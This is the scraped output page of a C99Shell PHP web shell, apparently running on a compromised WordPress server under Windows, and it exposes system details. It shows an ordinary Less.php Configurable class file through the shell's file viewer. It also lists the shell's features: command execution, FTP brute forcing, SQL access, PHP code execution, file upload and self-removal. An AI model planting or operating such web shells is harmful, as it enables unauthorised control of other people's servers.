!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\plugins\wcp-contact-form\vendor\oyejorge\less.php\lib\Less\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.44%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Configurable.php (1.19 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * Configurable
 *
 * @package Less
 * @subpackage Core
 */
abstract class Less_Configurable {

    
/**
     * Array of options
     *
     * @var array
     */
    
protected $options = array();

    
/**
     * Array of default options
     *
     * @var array
     */
    
protected $defaultOptions = array();


    
/**
     * Set options
     *
     * If $options is an object it will be converted into an array by called
     * it's toArray method.
     *
     * @throws Exception
     * @param array|object $options
     *
     */
    
public function setOptions($options){
        
$options array_intersect_key($options,$this->defaultOptions);
        
$this->options array_merge($this->defaultOptions$this->options$options);
    }


    
/**
     * Get an option value by name
     *
     * If the option is empty or not set a NULL value will be returned.
     *
     * @param string $name
     * @param mixed $default Default value if confiuration of $name is not present
     * @return mixed
     */
    
public function getOption($name$default null){
        if(isset(
$this->options[$name])){
            return 
$this->options[$name];
        }
        return 
$default;
    }


    
/**
     * Set an option
     *
     * @param string $name
     * @param mixed $value
     */
    
public function setOption($name$value){
        
$this->options[$name] = $value;
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--